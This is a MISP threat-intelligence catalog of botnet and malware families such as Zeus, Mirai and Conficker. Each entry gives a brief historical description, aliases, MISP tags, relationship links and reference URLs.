Botnet is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

Various

ADB.miner

A new botnet appeared over the weekend, and it’s targeting Android devices by scanning for open debug ports so it can infect victims with malware that mines the Monero cryptocurrency.

The botnet came to life on Saturday, February 3, and is targeting port 5555, which on devices running the Android OS is the port used by the operating system’s native Android Debug Bridge (ADB), a debugging interface that grants access to some of the operating system’s most sensitive features.

Only devices running the Android OS have been infected until now, such as smartphones, smart TVs, and TV top boxes, according to security researchers from Qihoo 360’s Network Security Research Lab [Netlab] division, the ones who discovered the botnet, which the named ADB.miner.

The tag is: misp-galaxy:botnet="ADB.miner"

Table 696. Table References

Links

https://www.bleepingcomputer.com/news/security/android-devices-targeted-by-new-monero-mining-botnet/

Bagle

Bagle (also known as Beagle) was a mass-mailing computer worm affecting Microsoft Windows. The first strain, Bagle.A, did not propagate widely. A second variant, Bagle.B, was considerably more virulent.

The tag is: misp-galaxy:botnet="Bagle"

Bagle is also known as:

  • Beagle

  • Mitglieder

  • Lodeight

Bagle has relationships with:

  • similar: misp-galaxy:malpedia="Bagle" with estimative-language:likelihood-probability="likely"

Table 697. Table References

Links

https://en.wikipedia.org/wiki/Bagle_(computer_worm)

Marina Botnet

Around the same time Bagle was sending spam messages all over the world, the Marina Botnet quickly made a name for itself. With over 6 million bots pumping out spam emails every single day, it became apparent these “hacker tools” could get out of hand very quickly. At its peak, Marina Botnet delivered 92 billion spam emails per day.

The tag is: misp-galaxy:botnet="Marina Botnet"

Marina Botnet is also known as:

  • Damon Briant

  • BOB.dc

  • Cotmonger

  • Hacktool.Spammer

  • Kraken

Marina Botnet has relationships with:

  • similar: misp-galaxy:botnet="Kraken" with estimative-language:likelihood-probability="likely"

Table 698. Table References

Links

https://en.wikipedia.org/wiki/Botnet

Torpig

Torpig, also known as Anserin or Sinowal is a type of botnet spread through systems compromised by the Mebroot rootkit by a variety of trojan horses for the purpose of collecting sensitive personal and corporate data such as bank account and credit card information. It targets computers that use Microsoft Windows, recruiting a network of zombies for the botnet. Torpig circumvents antivirus software through the use of rootkit technology and scans the infected system for credentials, accounts and passwords as well as potentially allowing attackers full access to the computer. It is also purportedly capable of modifying data hajimeon the computer, and can perform man-in-the-browser attacks.

The tag is: misp-galaxy:botnet="Torpig"

Torpig is also known as:

  • Sinowal

  • Anserin

Torpig has relationships with:

  • similar: misp-galaxy:malpedia="Sinowal" with estimative-language:likelihood-probability="likely"

Table 699. Table References

Links

https://en.wikipedia.org/wiki/Torpig

Storm

The Storm botnet or Storm worm botnet (also known as Dorf botnet and Ecard malware) is a remotely controlled network of "zombie" computers (or "botnet") that have been linked by the Storm Worm, a Trojan horse spread through e-mail spam. At its height in September 2007, the Storm botnet was running on anywhere from 1 million to 50 million computer systems, and accounted for 8% of all malware on Microsoft Windows computers. It was first identified around January 2007, having been distributed by email with subjects such as "230 dead as storm batters Europe," giving it its well-known name. The botnet began to decline in late 2007, and by mid-2008, had been reduced to infecting about 85,000 computers, far less than it had infected a year earlier.

The tag is: misp-galaxy:botnet="Storm"

Storm is also known as:

  • Nuwar

  • Peacomm

  • Zhelatin

  • Dorf

  • Ecard

Table 700. Table References

Links

https://en.wikipedia.org/wiki/Storm_botnet

Rustock

The tag is: misp-galaxy:botnet="Rustock"

Rustock is also known as:

  • RKRustok

  • Costrat

Rustock has relationships with:

  • similar: misp-galaxy:malpedia="Rustock" with estimative-language:likelihood-probability="likely"

Table 701. Table References

Links

https://en.wikipedia.org/wiki/Rustock_botnet

Donbot

The tag is: misp-galaxy:botnet="Donbot"

Donbot is also known as:

  • Buzus

  • Bachsoy

Donbot has relationships with:

  • similar: misp-galaxy:malpedia="Buzus" with estimative-language:likelihood-probability="likely"

Table 702. Table References

Links

https://en.wikipedia.org/wiki/Donbot_botnet

Cutwail

The Cutwail botnet, founded around 2007, is a botnet mostly involved in sending spam e-mails. The bot is typically installed on infected machines by a Trojan component called Pushdo.] It affects computers running Microsoft Windows. related to: Wigon, Pushdo

The tag is: misp-galaxy:botnet="Cutwail"

Cutwail is also known as:

  • Pandex

  • Mutant

Cutwail has relationships with:

  • similar: misp-galaxy:malpedia="Cutwail" with estimative-language:likelihood-probability="likely"

Table 703. Table References

Links

https://en.wikipedia.org/wiki/Cutwail_botnet

Akbot

Akbot was a computer virus that infected an estimated 1.3 million computers and added them to a botnet.

The tag is: misp-galaxy:botnet="Akbot"

Akbot has relationships with:

  • similar: misp-galaxy:tool="Akbot" with estimative-language:likelihood-probability="likely"

Table 704. Table References

Links

https://en.wikipedia.org/wiki/Akbot

Srizbi

Srizbi BotNet, considered one of the world’s largest botnets, and responsible for sending out more than half of all the spam being sent by all the major botnets combined. The botnets consist of computers infected by the Srizbi trojan, which sent spam on command. Srizbi suffered a massive setback in November 2008 when hosting provider Janka Cartel was taken down; global spam volumes reduced up to 93% as a result of this action.

The tag is: misp-galaxy:botnet="Srizbi"

Srizbi is also known as:

  • Cbeplay

  • Exchanger

Table 705. Table References

Links

https://en.wikipedia.org/wiki/Srizbi_botnet

Lethic

The Lethic Botnet (initially discovered around 2008) is a botnet consisting of an estimated 210 000 - 310 000 individual machines which are mainly involved in pharmaceutical and replica spam. At the peak of its existence the botnet was responsible for 8-10% of all the spam sent worldwide.

The tag is: misp-galaxy:botnet="Lethic"

Lethic has relationships with:

  • similar: misp-galaxy:malpedia="Lethic" with estimative-language:likelihood-probability="likely"

Table 706. Table References

Links

https://en.wikipedia.org/wiki/Lethic_botnet

Xarvester

The tag is: misp-galaxy:botnet="Xarvester"

Xarvester is also known as:

  • Rlsloup

  • Pixoliz

Table 707. Table References

Links

https://krebsonsecurity.com/tag/xarvester/

Sality

Sality is the classification for a family of malicious software (malware), which infects files on Microsoft Windows systems. Sality was first discovered in 2003 and has advanced over the years to become a dynamic, enduring and full-featured form of malicious code. Systems infected with Sality may communicate over a peer-to-peer (P2P) network for the purpose of relaying spam, proxying of communications, exfiltrating sensitive data, compromising web servers and/or coordinating distributed computing tasks for the purpose of processing intensive tasks (e.g. password cracking). Since 2010, certain variants of Sality have also incorporated the use of rootkit functions as part of an ongoing evolution of the malware family. Because of its continued development and capabilities, Sality is considered to be one of the most complex and formidable forms of malware to date.

The tag is: misp-galaxy:botnet="Sality"

Sality is also known as:

  • Sector

  • Kuku

  • Sality

  • SalLoad

  • Kookoo

  • SaliCode

  • Kukacka

Sality has relationships with:

  • similar: misp-galaxy:malpedia="Sality" with estimative-language:likelihood-probability="likely"

Table 708. Table References

Links

https://en.wikipedia.org/wiki/Sality

Mariposa

The Mariposa botnet, discovered December 2008, is a botnet mainly involved in cyberscamming and denial-of-service attacks. Before the botnet itself was dismantled on 23 December 2009, it consisted of up to 12 million unique IP addresses or up to 1 million individual zombie computers infected with the "Butterfly (mariposa in Spanish) Bot", making it one of the largest known botnets.

The tag is: misp-galaxy:botnet="Mariposa"

Table 709. Table References

Links

https://en.wikipedia.org/wiki/Mariposa_botnet

Conficker

Conficker, also known as Downup, Downadup and Kido, is a computer worm targeting the Microsoft Windows operating system that was first detected in November 2008. It uses flaws in Windows OS software and dictionary attacks on administrator passwords to propagate while forming a botnet, and has been unusually difficult to counter because of its combined use of many advanced malware techniques. The Conficker worm infected millions of computers including government, business and home computers in over 190 countries, making it the largest known computer worm infection since the 2003 Welchia.

The tag is: misp-galaxy:botnet="Conficker"

Conficker is also known as:

  • DownUp

  • DownAndUp

  • DownAdUp

  • Kido

Conficker has relationships with:

  • similar: misp-galaxy:malpedia="Conficker" with estimative-language:likelihood-probability="likely"

Table 710. Table References

Links

https://en.wikipedia.org/wiki/Conficker

Waledac

Waledac, also known by its aliases Waled and Waledpak, was a botnet mostly involved in e-mail spam and malware. In March 2010 the botnet was taken down by Microsoft.

The tag is: misp-galaxy:botnet="Waledac"

Waledac is also known as:

  • Waled

  • Waledpak

Table 711. Table References

Links

https://en.wikipedia.org/wiki/Waledac_botnet

Maazben

A new botnet, dubbed Maazben, has also been observed and is also growing rapidly. MessageLabs Intelligence has been tracking the growth of Maazben since its infancy in late May and early June. Its dominance in terms of the proportion of spam has been accelerating in the last 30 days from just over 0.5% of all spam, peaking at 4.5% of spam when it is most active. Currently spam from Maazben accounts for approximately 1.4% of all spam, but this is likely to increase significantly over time, particularly since both overall spam per minute sent and spam per bot per minute are increasing.

The tag is: misp-galaxy:botnet="Maazben"

Table 712. Table References

Links

https://www.symantec.com/connect/blogs/evaluating-botnet-capacity

Onewordsub

The tag is: misp-galaxy:botnet="Onewordsub"

Table 713. Table References

Links

https://www.botnets.fr/wiki/OneWordSub

Gheg

Tofsee, also known as Gheg, is another botnet analyzed by CERT Polska. Its main job is to send spam, but it is able to do other tasks as well. It is possible thanks to the modular design of this malware – it consists of the main binary (the one user downloads and infects with), which later downloads several additional modules from the C2 server – they modify code by overwriting some of the called functions with their own. An example of some actions these modules perform is spreading by posting click-bait messages on Facebook and VKontakte (Russian social network).

The tag is: misp-galaxy:botnet="Gheg"

Gheg is also known as:

  • Tofsee

  • Mondera

Gheg has relationships with:

  • similar: misp-galaxy:malpedia="Tofsee" with estimative-language:likelihood-probability="likely"

Table 714. Table References

Links

https://www.cert.pl/en/news/single/tofsee-en/

Nucrypt

The tag is: misp-galaxy:botnet="Nucrypt"

Table 715. Table References

Links

https://www.botnets.fr/wiki.old/index.php?title=Nucrypt&setlang=en

Wopla

The tag is: misp-galaxy:botnet="Wopla"

Table 716. Table References

Links

https://www.botnets.fr/wiki.old/index.php/Wopla

Asprox

The Asprox botnet (discovered around 2008), also known by its aliases Badsrc and Aseljo, is a botnet mostly involved in phishing scams and performing SQL injections into websites in order to spread malware.

The tag is: misp-galaxy:botnet="Asprox"

Asprox is also known as:

  • Badsrc

  • Aseljo

  • Danmec

  • Hydraflux

Asprox has relationships with:

  • similar: misp-galaxy:malpedia="Asprox" with estimative-language:likelihood-probability="likely"

Table 717. Table References

Links

https://en.wikipedia.org/wiki/Asprox_botnet

Spamthru

Spam Thru represented an expontential jump in the level of sophistication and complexity of these botnets, harnessing a 70,000 strong peer to peer botnet seeded with the Spam Thru Trojan. Spam Thru is also known by the Aliases Backdoor.Win32.Agent.uu, Spam-DComServ and Troj_Agent.Bor. Spam Thru was unique because it had its own antivirus engine designed to remove any other malicious programs residing in the same infected host machine so that it can get unlimited access to the machine’s processing power as well as bandwidth. It also had the potential to be 10 times more productive than most other botnets while evading detection because of in-built defences.

The tag is: misp-galaxy:botnet="Spamthru"

Spamthru is also known as:

  • Spam-DComServ

  • Covesmer

  • Xmiler

Table 718. Table References

Links

http://www.root777.com/security/analysis-of-spam-thru-botnet/

Gumblar

Gumblar is a malicious JavaScript trojan horse file that redirects a user’s Google searches, and then installs rogue security software. Also known as Troj/JSRedir-R this botnet first appeared in 2009.

The tag is: misp-galaxy:botnet="Gumblar"

Table 719. Table References

Links

https://en.wikipedia.org/wiki/Gumblar

BredoLab

The Bredolab botnet, also known by its alias Oficla, was a Russian botnet mostly involved in viral e-mail spam. Before the botnet was eventually dismantled in November 2010 through the seizure of its command and control servers, it was estimated to consist of millions of zombie computers.

The tag is: misp-galaxy:botnet="BredoLab"

BredoLab is also known as:

  • Oficla

BredoLab has relationships with:

  • similar: misp-galaxy:tool="Oficla" with estimative-language:likelihood-probability="likely"

Table 720. Table References

Links

https://en.wikipedia.org/wiki/Bredolab_botnet

Grum

The Grum botnet, also known by its alias Tedroo and Reddyb, was a botnet mostly involved in sending pharmaceutical spam e-mails. Once the world’s largest botnet, Grum can be traced back to as early as 2008. At the time of its shutdown in July 2012, Grum was reportedly the world’s 3rd largest botnet, responsible for 18% of worldwide spam traffic.

The tag is: misp-galaxy:botnet="Grum"

Grum is also known as:

  • Tedroo

  • Reddyb

Table 721. Table References

Links

https://en.wikipedia.org/wiki/Grum_botnet

Mega-D

The Mega-D, also known by its alias of Ozdok, is a botnet that at its peak was responsible for sending 32% of spam worldwide.

The tag is: misp-galaxy:botnet="Mega-D"

Mega-D is also known as:

  • Ozdok

Table 722. Table References

Links

https://en.wikipedia.org/wiki/Mega-D_botnet

Kraken

The Kraken botnet was the world’s largest botnet as of April 2008. Researchers say that Kraken infected machines in at least 50 of the Fortune 500 companies and grew to over 400,000 bots. It was estimated to send 9 billion spam messages per day. Kraken botnet malware may have been designed to evade anti-virus software, and employed techniques to stymie conventional anti-virus software.

The tag is: misp-galaxy:botnet="Kraken"

Kraken is also known as:

  • Kracken

Kraken has relationships with:

  • similar: misp-galaxy:botnet="Marina Botnet" with estimative-language:likelihood-probability="likely"

Table 723. Table References

Links

https://en.wikipedia.org/wiki/Kraken_botnet

Festi

The Festi botnet, also known by its alias of Spamnost, is a botnet mostly involved in email spam and denial of service attacks.

The tag is: misp-galaxy:botnet="Festi"

Festi is also known as:

  • Spamnost

Table 724. Table References

Links

https://en.wikipedia.org/wiki/Festi_botnet

Vulcanbot

Vulcanbot is the name of a botnet predominantly spread in Vietnam, apparently with political motives. It is thought to have begun in late 2009.

The tag is: misp-galaxy:botnet="Vulcanbot"

Table 725. Table References

Links

https://en.wikipedia.org/wiki/Vulcanbot

LowSec

The tag is: misp-galaxy:botnet="LowSec"

LowSec is also known as:

  • LowSecurity

  • FreeMoney

  • Ring0.Tools

TDL4

Alureon (also known as TDSS or TDL-4) is a trojan and bootkit created to steal data by intercepting a system’s network traffic and searching for: banking usernames and passwords, credit card data, PayPal information, social security numbers, and other sensitive user data. Following a series of customer complaints, Microsoft determined that Alureon caused a wave of BSoDs on some 32-bit Microsoft Windows systems. The update, MS10-015,triggered these crashes by breaking assumptions made by the malware author(s).

The tag is: misp-galaxy:botnet="TDL4"

TDL4 is also known as:

  • TDSS

  • Alureon

TDL4 has relationships with:

  • similar: misp-galaxy:malpedia="Alureon" with estimative-language:likelihood-probability="likely"

Table 726. Table References

Links

https://en.wikipedia.org/wiki/Alureon#TDL-4

Zeus

Zeus, ZeuS, or Zbot is a Trojan horse malware package that runs on versions of Microsoft Windows. While it can be used to carry out many malicious and criminal tasks, it is often used to steal banking information by man-in-the-browser keystroke logging and form grabbing. It is also used to install the CryptoLocker ransomware. Zeus is spread mainly through drive-by downloads and phishing schemes. First identified in July 2007 when it was used to steal information from the United States Department of Transportation, it became more widespread in March 2009. In June 2009 security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies as the Bank of America, NASA, Monster.com, ABC, Oracle, Play.com, Cisco, Amazon, and BusinessWeek. Similarly to Koobface, Zeus has also been used to trick victims of tech support scams into giving the scam artists money through pop-up messages that claim the user has a virus, when in reality they might have no viruses at all. The scammers may use programs such as Command prompt or Event viewer to make the user believe that their computer is infected.

The tag is: misp-galaxy:botnet="Zeus"

Zeus is also known as:

  • Zbot

  • ZeuS

  • PRG

  • Wsnpoem

  • Gorhax

  • Kneber

Zeus has relationships with:

  • similar: misp-galaxy:tool="Zeus" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:banker="Zeus" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Zeus" with estimative-language:likelihood-probability="likely"

Table 727. Table References

Links

https://en.wikipedia.org/wiki/Zeus_(malware)

Kelihos

The Kelihos botnet, also known as Hlux, is a botnet mainly involved in spamming and the theft of bitcoins.

The tag is: misp-galaxy:botnet="Kelihos"

Kelihos is also known as:

  • Hlux

Kelihos has relationships with:

  • similar: misp-galaxy:malpedia="Kelihos" with estimative-language:likelihood-probability="likely"

Table 728. Table References

Links

https://en.wikipedia.org/wiki/Kelihos_botnet

Ramnit

Ramnit is a Computer worm affecting Windows users. It was estimated that it infected 800 000 Windows PCs between September and December 2011. The Ramnit botnet was dismantled by Europol and Symantec securities in 2015. In 2015, this infection was estimated at 3 200 000 PCs.

The tag is: misp-galaxy:botnet="Ramnit"

Ramnit has relationships with:

  • similar: misp-galaxy:banker="Ramnit" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Ramnit" with estimative-language:likelihood-probability="likely"

Table 729. Table References

Links

https://en.wikipedia.org/wiki/Botnet

Zer0n3t

The tag is: misp-galaxy:botnet="Zer0n3t"

Zer0n3t is also known as:

  • Fib3rl0g1c

  • Zer0n3t

  • Zer0Log1x

Chameleon

The Chameleon botnet is a botnet that was discovered on February 28, 2013 by the security research firm, spider.io. It involved the infection of more than 120,000 computers and generated, on average, 6 million US dollars per month from advertising traffic. This traffic was generated on infected systems and looked to advertising parties as regular end users which browsed the Web, because of which it was seen as legitimate web traffic. The affected computers were all Windows PCs with the majority being private PCs (residential systems).

The tag is: misp-galaxy:botnet="Chameleon"

Table 730. Table References

Links

https://en.wikipedia.org/wiki/Chameleon_botnet

Mirai

Mirai (Japanese for "the future", 未来) is a malware that turns networked devices running Linux into remotely controlled "bots" that can be used as part of a botnet in large-scale network attacks. It primarily targets online consumer devices such as IP cameras and home routers. The Mirai botnet was first found in August 2016 by MalwareMustDie, a whitehat malware research group, and has been used in some of the largest and most disruptive distributed denial of service (DDoS) attacks, including an attack on 20 September 2016 on computer security journalist Brian Krebs’s web site, an attack on French web host OVH, and the October 2016 Dyn cyberattack.

The tag is: misp-galaxy:botnet="Mirai"

Mirai has relationships with:

  • similar: misp-galaxy:tool="Mirai" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Mirai (ELF)" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Owari" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Sora" with estimative-language:likelihood-probability="likely"

Table 731. Table References

Links

https://en.wikipedia.org/wiki/Mirai_(malware)

https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/

https://www.bleepingcomputer.com/news/security/mirai-iot-malware-uses-aboriginal-linux-to-target-multiple-platforms/

https://www.bleepingcomputer.com/news/security/new-mirai-variant-comes-with-27-exploits-targets-enterprise-devices/

XorDDoS

XOR DDOS is a Linux trojan used to perform large-scale DDoS

The tag is: misp-galaxy:botnet="XorDDoS"

Table 732. Table References

Links

https://en.wikipedia.org/wiki/Xor_DDoS

Satori

According to a report Li shared with Bleeping Computer today, the Mirai Satori variant is quite different from all previous pure Mirai variants.Previous Mirai versions infected IoT devices and then downloaded a Telnet scanner component that attempted to find other victims and infect them with the Mirai bot.The Satori variant does not use a scanner but uses two embedded exploits that will try to connect to remote devices on ports 37215 and 52869.Effectively, this makes Satori an IoT worm, being able to spread by itself without the need for separate components.

The tag is: misp-galaxy:botnet="Satori"

Satori is also known as:

  • Okiru

Satori has relationships with:

  • similar: misp-galaxy:tool="Satori" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Satori" with estimative-language:likelihood-probability="likely"

Table 733. Table References

Links

https://www.bleepingcomputer.com/news/security/satori-botnet-has-sudden-awakening-with-over-280-000-active-bots/

https://blog.fortinet.com/2017/12/12/rise-of-one-more-mirai-worm-variant

BetaBot

The tag is: misp-galaxy:botnet="BetaBot"

BetaBot has relationships with:

  • similar: misp-galaxy:malpedia="BetaBot" with estimative-language:likelihood-probability="likely"

Hajime

Hajime (meaning ‘beginning’ in Japanese) is an IoT worm that was first mentioned on 16 October 2016 in a public report by RapidityNetworks. One month later we saw the first samples being uploaded from Spain to VT. This worm builds a huge P2P botnet (almost 300,000 devices at the time of publishing this blogpost), but its real purpose remains unknown. It is worth mentioning that in the past, the Hajime IoT botnet was never used for massive DDoS attacks, and its existance was a mystery for many researchers, as the botnet only gathered infected devices but almost never did anything with them (except scan for other vulnerable devices).

The tag is: misp-galaxy:botnet="Hajime"

Hajime has relationships with:

  • similar: misp-galaxy:malpedia="Hajime" with estimative-language:likelihood-probability="likely"

Table 734. Table References

Links

https://www.bleepingcomputer.com/news/security/hajime-botnet-makes-a-comeback-with-massive-scan-for-mikrotik-routers/

https://en.wikipedia.org/wiki/Hajime_(malware)

https://securelist.com/hajime-the-mysterious-evolving-botnet/78160/

Muhstik

The botnet is exploiting the CVE-2018-7600 vulnerability —also known as Drupalgeddon 2— to access a specific URL and gain the ability to execute commands on a server running the Drupal CMS. At the technical level, Netlab says Muhstik is built on top of Tsunami, a very old strain of malware that has been used for years to create botnets by infecting Linux servers and smart devices running Linux-based firmware. Crooks have used Tsunami initially for DDoS attacks, but its feature-set has greatly expanded after its source code leaked online. The Muhstik version of Tsunami, according to a Netlab report published today, can launch DDoS attacks, install the XMRig Monero miner, or install the CGMiner to mine Dash cryptocurrency on infected hosts. Muhstik operators are using these three payloads to make money via the infected hosts.

The tag is: misp-galaxy:botnet="Muhstik"

Table 735. Table References

Links

https://www.bleepingcomputer.com/news/security/big-iot-botnet-starts-large-scale-exploitation-of-drupalgeddon-2-vulnerability/

Hide and Seek

Security researchers have discovered the first IoT botnet malware strain that can survive device reboots and remain on infected devices after the initial compromise. This is a major game-changing moment in the realm of IoT and router malware. Until today, equipment owners could always remove IoT malware from their smart devices, modems, and routers by resetting the device. The reset operation flushed the device’s flash memory, where the device would keep all its working data, including IoT malware strains. But today, Bitdefender researchers announced they found an IoT malware strain that under certain circumstances copies itself to /etc/init.d/, a folder that houses daemon scripts on Linux-based operating systems —like the ones on routers and IoT devices. By placing itself in this menu, the device’s OS will automatically start the malware’s process after the next reboot.

The tag is: misp-galaxy:botnet="Hide and Seek"

Hide and Seek is also known as:

  • HNS

  • Hide 'N Seek

Hide and Seek has relationships with:

  • similar: misp-galaxy:malpedia="Hide and Seek" with estimative-language:likelihood-probability="likely"

Table 736. Table References

Links

https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/

https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/

https://www.bleepingcomputer.com/news/security/hide-and-seek-botnet-adds-infection-vector-for-android-devices/

Mettle

Command-and-control panel and the scanner of this botnet is hosted on a server residing in Vietnam. Attackers have been utilizing an open-sourced Mettle attack module to implant malware on vulnerable routers.

The tag is: misp-galaxy:botnet="Mettle"

Table 737. Table References

Links

https://thehackernews.com/2018/05/botnet-malware-hacking.html

Owari

IoT botnet, Mirai variant that has added three exploits to its arsenal. After a successful exploit, this bot downloads its payload, Owari bot - another Mirai variant - or Omni bot. Author is called WICKED

The tag is: misp-galaxy:botnet="Owari"

Owari has relationships with:

  • similar: misp-galaxy:malpedia="Owari" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Mirai" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:tool="Mirai" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Sora" with estimative-language:likelihood-probability="likely"

Table 738. Table References

Links

https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html

Brain Food

Brain Food is usually the second step in a chain of redirections, its PHP code is polymorphic and obfuscated with multiple layers of base64 encoding. Backdoor functionalities are also embedded in the code allowing remote execution of shell code on web servers which are configured to allow the PHP 'system' command.

The tag is: misp-galaxy:botnet="Brain Food"

Table 739. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/brain-food-botnet-gives-website-operators-heartburn

Pontoeb

The bot gathers information from the infected system through WMI queries (SerialNumber, SystemDrive, operating system, processor architecture), which it then sends back to a remote attacker. It installs a backdoor giving an attacker the possibility to run command such as: download a file, update itself, visit a website and perform HTTP, SYN, UDP flooding

The tag is: misp-galaxy:botnet="Pontoeb"

Pontoeb is also known as:

  • N0ise

Table 740. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:MSIL/Pontoeb.J

http://dataprotectioncenter.com/general/are-you-beta-testing-malware/

Trik Spam Botnet

The tag is: misp-galaxy:botnet="Trik Spam Botnet"

Trik Spam Botnet is also known as:

  • Trik Trojan

Table 741. Table References

Links

https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/

Madmax

The tag is: misp-galaxy:botnet="Madmax"

Madmax is also known as:

  • Mad Max

Madmax has relationships with:

  • similar: misp-galaxy:tool="Mad Max" with estimative-language:likelihood-probability="likely"

Table 742. Table References

Links

https://news.softpedia.com/news/researchers-crack-mad-max-botnet-algorithm-and-see-in-the-future-506696.shtml

Pushdo

The tag is: misp-galaxy:botnet="Pushdo"

Pushdo has relationships with:

  • similar: misp-galaxy:malpedia="Pushdo" with estimative-language:likelihood-probability="likely"

Table 743. Table References

Links

https://labs.bitdefender.com/2013/12/in-depth-analysis-of-pushdo-botnet/

Simda

The tag is: misp-galaxy:botnet="Simda"

Simda has relationships with:

  • similar: misp-galaxy:malpedia="Simda" with estimative-language:likelihood-probability="likely"

Table 744. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA15-105A

Virut

The tag is: misp-galaxy:botnet="Virut"

Virut has relationships with:

  • similar: misp-galaxy:malpedia="Virut" with estimative-language:likelihood-probability="likely"

Table 745. Table References

Links

https://en.wikipedia.org/wiki/Virut

Bamital

The tag is: misp-galaxy:botnet="Bamital"

Bamital is also known as:

  • Mdrop-CSK

  • Agent-OCF

Table 747. Table References

Links

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32%2FBamital

https://www.symantec.com/security-center/writeup/2010-070108-5941-99

Gafgyt

Linux.Gafgyt is a Trojan horse that opens a back door on the compromised computer and steals information. The new Gafgyt version targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).

The tag is: misp-galaxy:botnet="Gafgyt"

Gafgyt is also known as:

  • Bashlite

Gafgyt has relationships with:

  • similar: misp-galaxy:tool="Gafgyt" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Bashlite" with estimative-language:likelihood-probability="likely"

Table 748. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/

https://www.symantec.com/security-center/writeup/2014-100222-5658-99

Sora

Big changes on the IoT malware scene. Security researchers have spotted a version of the Mirai IoT malware that can run on a vast range of architectures, and even on Android devices. This Mirai malware strain is called Sora, a strain that was first spotted at the start of the year.Initial versions were nothing out of the ordinary, and Sora’s original author soon moved on to developing the Mirai Owari version, shortly after Sora’s creation.

The tag is: misp-galaxy:botnet="Sora"

Sora is also known as:

  • Mirai Sora

Sora has relationships with:

  • variant-of: misp-galaxy:botnet="Mirai" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:tool="Mirai" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:botnet="Owari" with estimative-language:likelihood-probability="likely"

Table 749. Table References

Links

https://www.bleepingcomputer.com/news/security/mirai-iot-malware-uses-aboriginal-linux-to-target-multiple-platforms/

Torii

we have been observing a new malware strain, which we call Torii, that differs from Mirai and other botnets we know of, particularly in the advanced techniques it uses. The developers of the botnet seek wide coverage and for this purpose they created binaries for multiple CPU architectures, tailoring the malware for stealth and persistence.

The tag is: misp-galaxy:botnet="Torii"

Torii has relationships with:

  • similar: misp-galaxy:malpedia="Torii" with estimative-language:likelihood-probability="likely"

Table 750. Table References

Links

https://blog.avast.com/new-torii-botnet-threat-research

https://www.bleepingcomputer.com/news/security/new-iot-botnet-torii-uses-six-methods-for-persistence-has-no-clear-purpose/

Persirai

A new Internet of Things (IoT) botnet called Persirai (Detected by Trend Micro as ELF_PERSIRAI.A) has been discovered targeting over 1,000 Internet Protocol (IP) Camera models based on various Original Equipment Manufacturer (OEM) products. This development comes on the heels of Mirai—an open-source backdoor malware that caused some of the most notable incidents of 2016 via Distributed Denial-of-Service (DDoS) attacks that compromised IoT devices such as Digital Video Recorders (DVRs) and CCTV cameras—as well as the Hajime botnet.

The tag is: misp-galaxy:botnet="Persirai"

Persirai has relationships with:

  • similar: misp-galaxy:malpedia="Persirai" with estimative-language:likelihood-probability="likely"

Table 751. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/

Chalubo

Since early September, SophosLabs has been monitoring an increasingly prolific attack targeting Internet-facing SSH servers on Linux-based systems that has been dropping a newly-discovered family of denial-of-service bots we’re calling Chalubo. The attackers encrypt both the main bot component and its corresponding Lua script using the ChaCha stream cipher. This adoption of anti-analysis techniques demonstrates an evolution in Linux malware, as the authors have adopted principles more common to Windows malware in an effort to thwart detection. Like some of its predecessors, Chalubo incorporates code from the Xor.DDoS and Mirai malware families.

The tag is: misp-galaxy:botnet="Chalubo"

Table 752. Table References

Links

https://news.sophos.com/en-us/2018/10/22/chalubo-botnet-wants-to-ddos-from-your-server-or-iot-device/

AESDDoS

Our honeypot sensors recently detected an AESDDoS botnet malware variant (detected by Trend Micro as Backdoor.Linux.AESDDOS.J) exploiting a server-side template injection vulnerability (CVE-2019-3396) in the Widget Connector macro in Atlassian Confluence Server, a collaboration software program used by DevOps professionals.

The tag is: misp-galaxy:botnet="AESDDoS"

Table 753. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/aesddos-botnet-malware-exploits-cve-2019-3396-to-perform-remote-code-execution-ddos-attacks-and-cryptocurrency-mining/

Arceus

A set of DDoS botnet.

The tag is: misp-galaxy:botnet="Arceus"

Arceus is also known as:

  • Katura

  • MyraV

  • myra

Mozi

Mozi infects new devices through weak telnet passwords and exploitation.

The tag is: misp-galaxy:botnet="Mozi"

Table 754. Table References

Links

https://blog.netlab.360.com/mozi-another-botnet-using-dht/

https://threatpost.com/mozi-botnet-majority-iot-traffic/159337/

https://securityintelligence.com/posts/botnet-attack-mozi-mozied-into-town/

UPAS-Kit

UPAS-Kit was advertised by auroras a/k/a vinny in middle of june 2012 via exploit.in. Upas is the predecessor of Kronos. Marcus Hutchins helped create and, in partnership with another, sell malicious computer code, a/k/a malware, known as UPAS-Kit.

The tag is: misp-galaxy:botnet="UPAS-Kit"

